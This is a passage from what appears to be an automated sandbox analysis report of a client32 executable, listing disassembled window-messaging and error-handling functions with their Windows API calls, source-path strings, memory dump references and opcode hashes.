                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: FlashWindowEx
                                                                              • API String ID: 199729137-2859592226
                                                                              • Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                              • Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
                                                                              • Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                              • Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90
                                                                              Function 11002130 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(?), ref: 1100213A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • m_pToolbar, xrefs: 11002155
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h, xrefs: 11002150
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h$m_pToolbar
                                                                              • API String ID: 2577986331-281161189
                                                                              • Opcode ID: 35783d953fd85d00738a6eb2ba99d550ce6056d1f12e3eeb32741e389c5bd5cf
                                                                              • Instruction ID: 060336b2bd4469f278674b99be49374638fb6687acdde2fc2171db53485ff0b1
                                                                              • Opcode Fuzzy Hash: 35783d953fd85d00738a6eb2ba99d550ce6056d1f12e3eeb32741e389c5bd5cf
                                                                              • Instruction Fuzzy Hash: C6E09239F00511ABE715CA65E844F8AF3E9BF98744F000165E515D3621C730EC01CB90
                                                                              Function 110261E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110261F4
                                                                              • SetLastError.KERNEL32(00000078), ref: 11026211
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: WTSFreeMemory
                                                                              • API String ID: 199729137-4124798068
                                                                              • Opcode ID: 13d07f76c4a166e4ad18c5415da4463235fdc2a849b6dba1af9382bffb586c94
                                                                              • Instruction ID: 4cd1938c9d3efa718b6458be26612696890f57d6528778b9f588236970a85574
                                                                              • Opcode Fuzzy Hash: 13d07f76c4a166e4ad18c5415da4463235fdc2a849b6dba1af9382bffb586c94
                                                                              • Instruction Fuzzy Hash: D0E04872E8172C9BD334DFD4E944A96F7E8DF14B61F00053AE95597940C670A844CBE1
                                                                              Function 11001090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                              • m_hWnd, xrefs: 110010A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2046328329-2830328467
                                                                              • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                              • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                              • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                              • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                              Function 11001050 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                              • m_hWnd, xrefs: 11001066
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 819365019-2830328467
                                                                              • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                              • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                              • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                              • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                              Function 110010E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostMessageA.USER32(?,?,?,?), ref: 11001113
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                              • m_hWnd, xrefs: 110010F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 906220102-2830328467
                                                                              • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                              • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                              • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                              • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                              Function 11014130 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00001203,?,?), ref: 11014161
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101413E
                                                                              • m_hWnd, xrefs: 11014143
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                              • API String ID: 819365019-3507600817
                                                                              • Opcode ID: a4e8f6c1e0f0e719e49bb50dc02c9156cf18e10f3a85b9adc6d500caaea46bf6
                                                                              • Instruction ID: ce752b6915aa01a8741080b9e5a2c0ea08f5e284845c2bca3d31cce01905913c
                                                                              • Opcode Fuzzy Hash: a4e8f6c1e0f0e719e49bb50dc02c9156cf18e10f3a85b9adc6d500caaea46bf6
                                                                              • Instruction Fuzzy Hash: 60E08675A502187BD310DA81DC46FD6F39CEB55755F008126F9255A241D670B8408790
                                                                              Function 110151A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                              • m_hWnd, xrefs: 110151B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              • Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                              • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                              • Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                              • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
                                                                              Function 110141B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00001201,?,?), ref: 110141E1
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 110141BE
                                                                              • m_hWnd, xrefs: 110141C3
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                              • API String ID: 819365019-3507600817
                                                                              • Opcode ID: 2220ea4d4314ce11eb19b23b232e9ac23e65213a12c5755011ccedf5fcfbd85d
                                                                              • Instruction ID: e40b82f977eb721f415d7ce6a6c2c5c571fa6c694b71c8e0fe353644d2fc67f2
                                                                              • Opcode Fuzzy Hash: 2220ea4d4314ce11eb19b23b232e9ac23e65213a12c5755011ccedf5fcfbd85d
                                                                              • Instruction Fuzzy Hash: C6E0CD75A503187BD710DA81DC86FD7F39CDB54755F00C125FD2556640D670F950C790
                                                                              Function 11014230 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00001204,?,?), ref: 11014261
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101423E
                                                                              • m_hWnd, xrefs: 11014243
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                              • API String ID: 819365019-3507600817
                                                                              • Opcode ID: 4695f712f38e19e96030587a8b7603a3e15687e8071c6d8b407a0c9646f69055
                                                                              • Instruction ID: 55ae1fe25e9a5b1997f1acacac97235014ae2df67c49f839450db2036e8126b3
                                                                              • Opcode Fuzzy Hash: 4695f712f38e19e96030587a8b7603a3e15687e8071c6d8b407a0c9646f69055
                                                                              • Instruction Fuzzy Hash: DDE086796502187BD3109A81DC46ED6F39CDB44765F00C125F9255A240D670B8408790
                                                                              Function 110171F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
